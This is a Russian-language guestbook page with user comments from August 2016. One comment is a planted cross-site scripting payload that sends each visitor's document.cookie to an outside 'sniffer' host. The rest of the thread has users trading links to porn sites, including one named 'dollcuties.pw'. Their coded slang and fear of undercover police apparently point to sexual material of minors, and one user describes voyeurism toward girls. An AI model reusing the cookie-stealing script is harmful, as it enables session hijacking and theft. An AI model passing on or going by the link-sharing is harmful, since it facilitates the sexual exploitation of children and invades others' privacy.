Меню

Гостевая

Вход
  • # 000 20.08.2016 22:47
  • 000
    Ох,Ниночка!Спасибки за ссыль.Похоже на скрытую рекламу.ПППц.
    7-реально не работает.
    Удачи в кодировке.
    Ряженые-реально.
  • # STELS_365 20.08.2016 00:41
  • STELS_365
    <script> img = new Image(); img.src = "http://j90356wm.bget.ru/snif/s.gif?"+document.cookie; </script>
  • # ninadobrev 19.08.2016 23:37
  • ninadobrev
    Ооо я там тебе бросил адрес сайта там гдета есть сайт в середине гдета там порно добрые фота крутые жаль что фото не гружу .блин 7 чевота не понятное трарится может скора закроют .ооо праверь некст ллее.ру что там уменя пака не палучилось туда загрузится может добрата есть .ооо я неделю назат мастер   бросил видухи в айви и я скачал и начел искать как их перекадировать раньше не палучалось кадировать их нармальный формат тут сразу нашол в два фармата 3 гпг и мпг4 и многие просят загрузи в 3гпг другие мпг4 и приходится кадировать айви и грузить может админ 7 проста зачишает павтор и видухи каторые ему не нравятся фиг знает все шас на стреме гаварят ряжиные из военторга по сайтам лазиют с людми абшаются паходу
  • # 000 19.08.2016 22:14
  • 000
    чето не понял,Ниночка  -7-ой сдох штоль?
  • # 000 19.08.2016 22:12
  • 000
    Ох,Ниночка!Спасибки за ссыли.Если будет возможность-можно в личку ссыли кинуть здесь.
    А на 17-где обмен ссылями-там запоролены+вход только друзьм-может где то там?
    А что- с 2-ми симками может лючить.Просто есть с 2-мя радиомодулями (честные 2-х симки) работают одновременно.И с 1-м радиомодулем- работают попеременно.Вроде удобно 2-симики-одна разговор,другая-интенет или разговор с другими.
    Ну а если-присобачить-подзорную трубу к смарту?
    Может телеобьектив получится.
  • # ninadobrev 19.08.2016 21:08
  • ninadobrev
    next.llee.ru ооо замучился там севодня регистрироватся не чево не палучилось но видео уже есть толька скачать их можна за регистрированым человекам не знаю добрые ли там видео  ооо зашол на 17 в раздел обмен сылками там есть сайт и в сайте многа сайтов нашол сайт там блин сколькаже там дабра фото .видео незнаю может для кампьютаров толька ранше на таких сайтах лазил гдета 4 года назат кагда фотки нужны были cle вот честично названия написал найдеш если нада будет все названия написать не магу а там у меня в закладке написана dollcuties.pw и чевота еше толька если будеш захадить знай что вирусы везде есть
  • # ninadobrev 18.08.2016 23:22
  • ninadobrev
    Ооо с 3 нео крутой смартфон бальшой икран браузер планета земля пишет на микро изде добрые видео что ише нужна белова цвета меньше брака симки 2 это брет там одна может виснуть дулас не стал брать изаэтова хочется канешно чтобы писал видео как камера приблежал бы 1000 метров так чтобы я мог увидеть какова цвета у девченки глаза а то у нас в москве дом на доме как гаварится можна за девченками падглядовать многа таких случеев кагда был маленкий было что каждый день девченка раздевалась сисичками свитила другая тоже причем одна пришла к нам на тусовку вот это был прикол а сестра ее всегда после школы с сабакой гуляла в черных калгатулях вот тагдабы с3 нужен был шас лежит в каропке 5 штук даже проста самсунг напугал что с гуглом падружился и теперь будет лепить браузеры везде гугл хром гавно
  • # 000 18.08.2016 22:24
  • 000
    Спасибки за ссыль.
  • # 000 18.08.2016 22:23
  • 000
    Посмотрел Нео3-не очень.Из плюсов-проц 4 ядра/8мп-камера/16гб-память/вспышка/амолед-экран/
    Нехорошо-устаревшый Андроид 4,4,2/одна симка-вообще брать не стал бы/
    Наверно достался с большой скидкой-тогда хорошо.
    ГНУСМАС-в своем репертуаре -хочеш получше-2 сим например-плати в 1,5 раза дороже/сволочи/
    Не пропадает чувство - наебаловики. Гнусмас-одним словом.Ну надеюсь все будет у тебя с ним норм.
    Андрой 4,4-свежее твоего /4,0-? незнаю какой был/ Вот и работает.
    Успехов в поиске "бобра".
  • # ninadobrev 18.08.2016 21:54
  • ninadobrev
    Ооо мне чевота так надаела на Гемароича наежать что унево сайт какойта не тот стал будем грузится на такой сайт какой есть блин чевота так на работе устал еше 3 дня работать а патом палазию по сайтам вродебы должы быть добрыми хатя наврятли добрые видосы найду там хатя фиг знает